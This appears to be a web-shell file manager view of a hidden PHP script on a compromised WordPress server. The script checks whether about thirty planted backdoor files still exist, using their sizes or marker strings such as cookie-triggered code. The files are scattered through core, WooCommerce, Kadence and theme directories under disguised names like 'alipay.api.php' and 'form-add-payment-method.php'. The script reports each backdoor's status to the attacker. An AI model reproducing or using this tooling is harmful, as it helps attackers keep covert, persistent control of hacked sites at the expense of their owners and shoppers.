Viewing File: /dev/shm/.parameter_group

<?php   $r = '/home/kinglbcx/public_html'; $x = ["/wp-includes/l10n.php"=>"bd@@127122981@@$_COOKIE[6",
"/wp-content/plugins/woocommerce/assets/client/blocks/blocks-checkout.asset.php"=>"bd@@122112941@@auth_exception_handler",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/symfony/http-foundation/RateLimiter/blocks.php"=>"bd@@112112065@@1579",
"/wp-content/plugins/joli-faq-seo/includes/fs/templates/forms/affiliation.php"=>"bd@@112237306@@task_processor",
"/wp-content/plugins/woocommerce/templates/myaccount/form-add-payment-method.php"=>"bd@@127123080@@module_controller",
"/wp-content/themes/designexo/sidebar-footer.php"=>"bd@@113887624@@2357",
"/wp-content/plugins/woocommerce/src/Admin/API/Reports/Stock/Template.in.php"=>"bd@@127123097@@1801",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/symfony/mime/Part/Multipart/supprimg.php"=>"bd@@112110984@@617",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/psr/container/src/alipay.api.php"=>"bd@@127123094@@664",
"/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/Comment/Regex.php"=>"bd@@127123099@@1502",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Auth/Token/Token.php"=>"bd@@127123087@@614",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/symfony/polyfill-intl-normalizer/Resources/unidata/combiningClass.php"=>"bd@@127123065@@52",
"/wp-content/themes/designexo/inc/class-bootstrap-navwalker.php"=>"bd@@127123085@@22",
"/wp-admin/privacy.php"=>"bd@@132166108@@32",
"/wp-content/themes/designexo/inc/customizer/customizer-settings/theme-settings/designexo-typography-customizer-settings.php"=>"bd@@132166897@@46",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/symfony/string/Resources/data/wcswidth.table.zero.php"=>"bd@@132167085@@1999",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/vlucas/phpdotenv/src/Parser/access.php"=>"bd@@132167107@@619",
"/wp-content/plugins/woocommerce/packages/email-editor/src/Engine/Patterns/class.abstract.pattern.php"=>"bd@@132167162@@655",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Components/Default.php"=>"bd@@112188296@@2392",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/symfony/polyfill-intl-normalizer/Resources/unidata/addpic.php"=>"bd@@112241423@@684",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/API/V3/Contracts/Client.V3.php"=>"bd@@112417043@@1672",
"/wp-content/plugins/woocommerce/vendor/opis/json-schema/src/Keywords/dbp.php"=>"bd@@132167187@@611",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-single-variation-notice/insenz.func.php"=>"bd@@122113055@@1967",
"/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-reports-controller.php"=>"bd@@122111790@@data_storage",
"/wp-content/plugins/joli-faq-seo/includes/fs/templates/checkout/process.php"=>"bd@@132167219@@696",
"/wp-content/themes/avantex/theme-menu/menu-file.php"=>"bd@@128127028@@7429",
"/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-payment-gateways-controller.php"=>"bd@@132166977@@event_handler",
"/wp-content/plugins/joli-faq-seo/assets/admin/css/health.php"=>"bd@@112050243@@699",
"/wp-content/themes/avantex/footer.php"=>"bd@@132166252@@65",
"/wp-includes/html-api/class-wp-html-active-formatting-elements.php"=>"bd@@127123057@@sync_manager",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Admin/License.php"=>"bd@@112417171@@2141",
"/wp-content/plugins/woocommerce/includes/class-wc-install.php"=>"bd@@132166051@@framework",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/monolog/monolog/src/Monolog/Attribute/patfactory.php"=>"bd@@112222933@@639"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 
Back to Directory File Manager
<